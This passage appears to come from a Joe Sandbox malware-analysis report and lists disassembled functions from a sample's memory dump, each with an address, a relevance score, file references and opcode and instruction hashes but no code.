                                • Opcode Fuzzy Hash: 52c9b607f4d7c0691a832f296012c689bfc89732c2fa44954ee0e1e1774570f3
                                • Instruction Fuzzy Hash: F491E131B0EB8D8FDB59EF2888655B97BA1FF99300F0541BED449C72A2DA34AD01C781
                                Function 00007FFD9B8F06C0 Relevance: .3, Instructions: 295COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f605526fcdee881f5b2a48add43b2277524199acc21bb1dce1cc766b8df34507
                                • Instruction ID: e9bbdf77d1989ae1d39eda27904fa07f05678c7a82c9763bbbda9ea146ca90db
                                • Opcode Fuzzy Hash: f605526fcdee881f5b2a48add43b2277524199acc21bb1dce1cc766b8df34507
                                • Instruction Fuzzy Hash: 68914962B1F6CD4FE7215BB858690B83FA0EF56710B0A42F7D058C60F7EC19AA058391
                                Function 00007FFD9B8FC890 Relevance: .3, Instructions: 294COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3881421d9adf5d81c7cc215480425b8ba9e048947f8db5af45ffd12b375ffe8c
                                • Instruction ID: 9820e00ff6be5bf41bd0588fd3378540fb9780108a000172d8bb88ad88241572
                                • Opcode Fuzzy Hash: 3881421d9adf5d81c7cc215480425b8ba9e048947f8db5af45ffd12b375ffe8c
                                • Instruction Fuzzy Hash: C0A18330A4E78E8FDB55DF6888295E93FB0FF09300F0645BBD458C70A2DA34AA54CB81
                                Function 00007FFD9B8F1698 Relevance: .3, Instructions: 284COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b603d3aeab0fba7cbe1aacbb89a3d08036a29edc7c331934c32933d994b2bcf3
                                • Instruction ID: 61d2483b1e8b8024ccdb86b477ed328237dc6d53ff9a927f29eee3aa5d6b76d4
                                • Opcode Fuzzy Hash: b603d3aeab0fba7cbe1aacbb89a3d08036a29edc7c331934c32933d994b2bcf3
                                • Instruction Fuzzy Hash: A681D031B0DA4D4FDB98EF5C88615A97BE2EFD8300B15067EE45DC32A6DE35AD028780
                                Function 00007FFD9B8F05F0 Relevance: .3, Instructions: 273COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4fbb69f32aeaf56c66c962f59c6ec81e73cc457a058abec8bf903e37dce13017
                                • Instruction ID: ed9c94c1c2a7593381472d37e5a6811acfcb42c0eaca81629bd2a12b1a929517
                                • Opcode Fuzzy Hash: 4fbb69f32aeaf56c66c962f59c6ec81e73cc457a058abec8bf903e37dce13017
                                • Instruction Fuzzy Hash: A481F430B09A4E8FDB59EF5888645BA7BE1FF98300F11457ED45AC72A5DE35AD02C780
                                Function 00007FFD9B8FCBFB Relevance: .3, Instructions: 253COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ace4f792dc74689a909e90fdb13c61bfcd877ccc96d8f8b9737729f9339c3702
                                • Instruction ID: 7f3312c2045d4cac38275d01ef7d258f4c6ad54cc686130c39a6a5ea41770844
                                • Opcode Fuzzy Hash: ace4f792dc74689a909e90fdb13c61bfcd877ccc96d8f8b9737729f9339c3702
                                • Instruction Fuzzy Hash: 71715817B0D16A0AE71577BCB8294EC3F60DF4133AB5A40B7D19D8A0E3ED1C394986D5
                                Function 00007FFD9B902F91 Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b0c694c3e1a5d280b3202ac9e8fea33b26b1356c2fac3c283b0848cd93247d4
                                • Instruction ID: a685828d97644a8d2daa0450710548fe549cd41cdd4b274fa8dfa77b8b9336f8
                                • Opcode Fuzzy Hash: 2b0c694c3e1a5d280b3202ac9e8fea33b26b1356c2fac3c283b0848cd93247d4
                                • Instruction Fuzzy Hash: E691C570E1991D9FDBA4EF98C855BEDB7B1FB58300F5142AAD40DE3291DF346A848B40
                                Function 00007FFD9B9010E8 Relevance: .2, Instructions: 248COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48a1c8fcc5f20ca8ea195cf7c76f49c6033e33d420b700a243be10832de5c7a4
                                • Instruction ID: 082b1995d578b07f828336fbc36c823d606395004b0fab441ef92861d5e21b5e
                                • Opcode Fuzzy Hash: 48a1c8fcc5f20ca8ea195cf7c76f49c6033e33d420b700a243be10832de5c7a4
                                • Instruction Fuzzy Hash: 77919F34A1A65E8FEBA5DF64C8656ED7BF0FF16304F0105BAE458D31A1DB385644C740
                                Function 00007FFD9B8F3078 Relevance: .2, Instructions: 236COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: befa7a8735d966454d676fefd8a4717d15888f03295eed0405473e0fd5180744
                                • Instruction ID: c28328d7c761c98f63e772bc0ce9cae512bd656a9ac5f0e7139061e1b49bcebf
                                • Opcode Fuzzy Hash: befa7a8735d966454d676fefd8a4717d15888f03295eed0405473e0fd5180744
                                • Instruction Fuzzy Hash: AC818130F0E68E8FEB61DBA4C8656E97FF0FF49300F4505BAD449D71A2DA28AA44C751
                                Function 00007FFD9B8F3120 Relevance: .2, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ef49e4a718d4b2da1ab3272bf7852d01c2752157073d338932bf7855ad4f544
                                • Instruction ID: 85f6730b759e03cf83b6040c7516b0e28b0282b9370cc58b5a28561230d528f8
                                • Opcode Fuzzy Hash: 2ef49e4a718d4b2da1ab3272bf7852d01c2752157073d338932bf7855ad4f544
                                • Instruction Fuzzy Hash: E0816130F1A50E8FEB60EBA4C4686ED7BF1FF49300F414576D409D71A5DA38AA44CB50
                                Function 00007FFD9B8FB068 Relevance: .2, Instructions: 215COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 45c54604b70634db06f36ca6f77eea9dc922e9d88767d6415da0c6cfc2190175
                                • Instruction ID: 3153ed2e580b7687c3404a0c515e47ae2ecbdcde510ddcdd05b0fa37076e3023
                                • Opcode Fuzzy Hash: 45c54604b70634db06f36ca6f77eea9dc922e9d88767d6415da0c6cfc2190175
                                • Instruction Fuzzy Hash: 2D718434A1A74E9FDB659FA488251FE3BE0FF09300F02457AE859D21E2DB38A644C781
                                Function 00007FFD9B8F2988 Relevance: .2, Instructions: 204COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c61b77bb92bbbc6c28adf37c2ef941eebcc0bd95076d5088484ce7f46065f55
                                • Instruction ID: 6ffe8cbeeff3a365f1fbdf33d10e1206e9957fcaf88b76adbcba711956f68399
                                • Opcode Fuzzy Hash: 0c61b77bb92bbbc6c28adf37c2ef941eebcc0bd95076d5088484ce7f46065f55
                                • Instruction Fuzzy Hash: B161E334A1F24E9FEB65ABB498286FD3BB0EF05324F0505BBD499C61E2DA3C6544C741
                                Function 00007FFD9B901178 Relevance: .2, Instructions: 194COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 303f9b2f5c5cb54cd223a62ddea5c3d5e37e8863e3d93dd265292e6be82a0dc0
                                • Instruction ID: a069003216bbb66cc11bf6776201902fac8ba50a5bc76177c47ed32ac9c7dd10
                                • Opcode Fuzzy Hash: 303f9b2f5c5cb54cd223a62ddea5c3d5e37e8863e3d93dd265292e6be82a0dc0
                                • Instruction Fuzzy Hash: 25719D34A1A65E8FEB65DF64C8652ED7BF0FF1A304F0105BAE448D71A1DB386A44CB41
                                Function 00007FFD9B8F29E0 Relevance: .2, Instructions: 192COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d90dbfc97bbc1be27c03fed0872fe99fc150d7d75336e7ce2987ff852c3995a4
                                • Instruction ID: 0c41cf5f4de8847cd6b0646fd34f52203f1189e6295893fd0b947e1f4e78cf52
                                • Opcode Fuzzy Hash: d90dbfc97bbc1be27c03fed0872fe99fc150d7d75336e7ce2987ff852c3995a4
                                • Instruction Fuzzy Hash: 0F619234A1A64D9FEB95EB74C8686BA7BF0FF19310F0545BBC449C71A1DA38A644C701
                                Function 00007FFD9B8FCDD0 Relevance: .2, Instructions: 192COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e5ee85218c4bc2ad26e3b6f832e5d41229bc23fce13648a826366ba195a096f
                                • Instruction ID: 217957057b65cfffabd05600874ba784b401594d8af6d1a4937575a8bc35ce67
                                • Opcode Fuzzy Hash: 0e5ee85218c4bc2ad26e3b6f832e5d41229bc23fce13648a826366ba195a096f
                                • Instruction Fuzzy Hash: 5C614F22B0E7C64FD712AB7898794E97FB0EF0621571A00FBC498CB0E7DE295945C791
                                Function 00007FFD9B902C68 Relevance: .2, Instructions: 192COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee75ab8e3947dc2bf6876c78811bf0e20eac1122a559a5fe98a9a98566ee0e0d
                                • Instruction ID: 1e48b146881bd9fb94be50f8682ba5c79f74584106280650e54e023e0d012e56
                                • Opcode Fuzzy Hash: ee75ab8e3947dc2bf6876c78811bf0e20eac1122a559a5fe98a9a98566ee0e0d
                                • Instruction Fuzzy Hash: 1C61A030A1A65D9FDB55EBE4C869AEDBBB0FF09300F4101BAE009D72E2DE386945C751
                                Function 00007FFD9B8F29A8 Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 10d3556e602b9e6d636fed25fe3e4647009f9a9db01cc760fb885178ceab2f57
                                • Instruction ID: 2f9685f1448c66be8742da5b8a1b752348f8411db2e05c7bb105733585fb836a
                                • Opcode Fuzzy Hash: 10d3556e602b9e6d636fed25fe3e4647009f9a9db01cc760fb885178ceab2f57
                                • Instruction Fuzzy Hash: B651E334A1E28E9FEB55ABB498286FD3BB0EF05324F0545BBD498C61E2EE3C6544C741
                                Function 00007FFD9B8FB070 Relevance: .2, Instructions: 182COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3a54cbae96a7a0551ff62df2bd6f362f90973930d91a9e9bab58bee84e4c9c0e
                                • Instruction ID: 79f18b3f71ce008556af02ff5f84a838e7b0c37e591af801f544c7294b118102
                                • Opcode Fuzzy Hash: 3a54cbae96a7a0551ff62df2bd6f362f90973930d91a9e9bab58bee84e4c9c0e
                                • Instruction Fuzzy Hash: F2518134A2A64E9FDB65DFA488251FE7BE0FF09300F02457AE459D31A1DB38A644CB81
                                Function 00007FFD9B906570 Relevance: .2, Instructions: 176COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6309eec3b594488a4b33abd4e68c4354727f191e602ce2e29c8937f87add1aab
                                • Instruction ID: e9d653af7a1c49ec8bd5eb6ab20fe72598eca3eb8e41b2b54de004475c883986
                                • Opcode Fuzzy Hash: 6309eec3b594488a4b33abd4e68c4354727f191e602ce2e29c8937f87add1aab
                                • Instruction Fuzzy Hash: F7616E34E1E65E9FEBA49BA488297B977B0FF05300F0101BAD45DD31A2DF386A84CB41
                                Function 00007FFD9B903C68 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8f5a9c50a6195a641712495930b2077901c8d41da7dbce5137aa1f64a6ede0d
                                • Instruction ID: 200f468182f8ae48ce4c308e790153b98fc39b074924740a0530885489692287
                                • Opcode Fuzzy Hash: b8f5a9c50a6195a641712495930b2077901c8d41da7dbce5137aa1f64a6ede0d
                                • Instruction Fuzzy Hash: 8E513634A1E64E9FEBA5EF6488B55B93BE0FF14300F0144BAD45DCA1A2DE38A644C741
                                Function 00007FFD9B8F29D8 Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 179fa6490d051da2094b0b57a0a8f5e2283696d8654ac3d53c8e245225c4963e
                                • Instruction ID: dc5bde59882ec855a9aea0dbaf4caa8a825b9b1a087e8e09fbe27a9977b6ec2d
                                • Opcode Fuzzy Hash: 179fa6490d051da2094b0b57a0a8f5e2283696d8654ac3d53c8e245225c4963e
                                • Instruction Fuzzy Hash: 1351A134A1F64E9FEB659BB488286FD7BB0FF05310F0505BBD459C62A2DA3CA644C701
                                Function 00007FFD9B8F1D49 Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 285bd88c3689040dc532e79f56edeb42893ab35f72e16894fcc8a486214dac25
                                • Instruction ID: 923bccaf27890f8fb8de27d30196fc0a9b56e211f346bf55a7a2af3a246d4ef9
                                • Opcode Fuzzy Hash: 285bd88c3689040dc532e79f56edeb42893ab35f72e16894fcc8a486214dac25
                                • Instruction Fuzzy Hash: 80419E31B18A4D4BDB5CEF5888645BA77E2FBD8301B10467EE45EC3295DE30ED128780
                                Function 00007FFD9B8F2E8D Relevance: .2, Instructions: 157COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02fa0a1608070745564eb020be69c66fc3927099c3a7cd63bc45ba288907b4e0
                                • Instruction ID: a00c581fd433fb854d0f467f8045370867931da97af50e16e421f813dab8a617
                                • Opcode Fuzzy Hash: 02fa0a1608070745564eb020be69c66fc3927099c3a7cd63bc45ba288907b4e0
                                • Instruction Fuzzy Hash: 8851B870B1E64E8FE761EFA4C8686A97FE0FF09300F5605B6D408D71A6DB38AA44C751
                                Function 00007FFD9B8FCCD3 Relevance: .2, Instructions: 154COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee9a873688981b2ecfee68bb134f79f274d9fd8ddf0ab45a0965dfe896bf5fc6
                                • Instruction ID: 579892e181c14ead4324dbba3359f891d04cb3c5d89705aac7839be99bd3c74d
                                • Opcode Fuzzy Hash: ee9a873688981b2ecfee68bb134f79f274d9fd8ddf0ab45a0965dfe896bf5fc6
                                • Instruction Fuzzy Hash: 3B411D26B0E29B0BE76577A8A8394FC3F70DF45335B5600B7D05DCA0E3DD182A4586D5
                                Function 00007FFD9B8F119D Relevance: .2, Instructions: 153COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f60302852eec3ff598cb4d6d2bff57c8fafe83bb17e2fbfef8384a4e672a3299
                                • Instruction ID: 7a9f0f098e2bc64a56c87cdc9b4daa24982eaf91ad8c194f8dad07d5d1dfd631
                                • Opcode Fuzzy Hash: f60302852eec3ff598cb4d6d2bff57c8fafe83bb17e2fbfef8384a4e672a3299
                                • Instruction Fuzzy Hash: 0D519431B0A54E4FEB65EBA8C4656FD7BE0FF59310F0504BAD019D71A2DA35A944C780
                                Function 00007FFD9B9029F8 Relevance: .1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be18a3cbb2659cbbb4386a6c70e8a760c12e42c4ad5fdb6e66f96a6444730550
                                • Instruction ID: 66931409fe313f57ef66e6c7e69147f7b56d1eb43ae73d8aee042931850ff412
                                • Opcode Fuzzy Hash: be18a3cbb2659cbbb4386a6c70e8a760c12e42c4ad5fdb6e66f96a6444730550
                                • Instruction Fuzzy Hash: C0517334A1A64E9FDB65DFA4C8251FD3BE0FF49310F02457AE849D31A1DB38AA44CB81
                                Function 00007FFD9B901208 Relevance: .1, Instructions: 146COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 109ed338abebf257c1618d5497cdde8a74dff5295b4c7c92caf15c716d0ddbfe
                                • Instruction ID: 262b9aeb78a257b0ec393b1c54bf76a03f93b56c8f83423967fc5f8129d46a3d
                                • Opcode Fuzzy Hash: 109ed338abebf257c1618d5497cdde8a74dff5295b4c7c92caf15c716d0ddbfe
                                • Instruction Fuzzy Hash: D4519B34A1965E8FEB69DFA4C8646ED7BF0FF1A304F01057AE448D71A1DB786A84CB40
                                Function 00007FFD9B8F0805 Relevance: .1, Instructions: 143COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 94a8a6a182d317c5960ea9c33629ab2c1e8433cb9e1ddc53184b4768e88e5746
                                • Instruction ID: 7fc3b0a88c0f18ef9ed9a3c6a4be119e443fa908e0f7a06a1ff510a685c1e054
                                • Opcode Fuzzy Hash: 94a8a6a182d317c5960ea9c33629ab2c1e8433cb9e1ddc53184b4768e88e5746
                                • Instruction Fuzzy Hash: 79414921B2F28A8FE7216BB88C755E83FA0FF55614F0641B7C069CA0D3ED186559C381
                                Function 00007FFD9B8F3190 Relevance: .1, Instructions: 137COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6722e09c56490c695b26729efd4a8ce9f7829d68bc18c8fc307aed1e8023b4d8
                                • Instruction ID: 72d63307903e1153a894090a2923f84de200ffc49e7bbd4265a313d45cbe2a12
                                • Opcode Fuzzy Hash: 6722e09c56490c695b26729efd4a8ce9f7829d68bc18c8fc307aed1e8023b4d8
                                • Instruction Fuzzy Hash: C1413E30F1A65E8FEB64EBA4C8646ED7BF1FF48300F410579D409E72A5DA38AA44CB50
                                Function 00007FFD9B902E51 Relevance: .1, Instructions: 137COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a6021fd3075bb7ff0f7c5d928203878b6dd6de2bba877e424dceebaf466ac1c
                                • Instruction ID: 7339fb5804c46aaa6980b3497b8a6b8aaac0ec8fa905830bf552540ba075b2cc
                                • Opcode Fuzzy Hash: 5a6021fd3075bb7ff0f7c5d928203878b6dd6de2bba877e424dceebaf466ac1c
                                • Instruction Fuzzy Hash: 3241A334E1E54E9FEB61EBA4C8686ED7BF1FF09300F1145B6D408D71A6DB38A6848B00
                                Function 00007FFD9B8F11B0 Relevance: .1, Instructions: 120COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 976423fbe45b1533aacd15d14f42dcf695c850224f3d650d2a716be74d3b9199
                                • Instruction ID: 9a54751c1cc0a1426c2416eaa4ee84aeb7b20ed09936504f2c46871d0a6e21a6
                                • Opcode Fuzzy Hash: 976423fbe45b1533aacd15d14f42dcf695c850224f3d650d2a716be74d3b9199
                                • Instruction Fuzzy Hash: 03316031F1A68E4FEBA4EBA888656FD7BE0FF59310F05007AD419D21A2DA3869448781
                                Function 00007FFD9B8FC5E5 Relevance: .1, Instructions: 117COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc0ff70881358346e9fe2765b5f040f89a38832b174717d93f57949869798bc9
                                • Instruction ID: 593a89a6b72108281b5cb0e91fdd71fd0a7ffcb5717de49d598f891a87192fbb
                                • Opcode Fuzzy Hash: fc0ff70881358346e9fe2765b5f040f89a38832b174717d93f57949869798bc9
                                • Instruction Fuzzy Hash: F131CA74F1991D8EEBA4EB98C8696ACBBF1FF5C300F511139D00DD32A2DE246D418B80
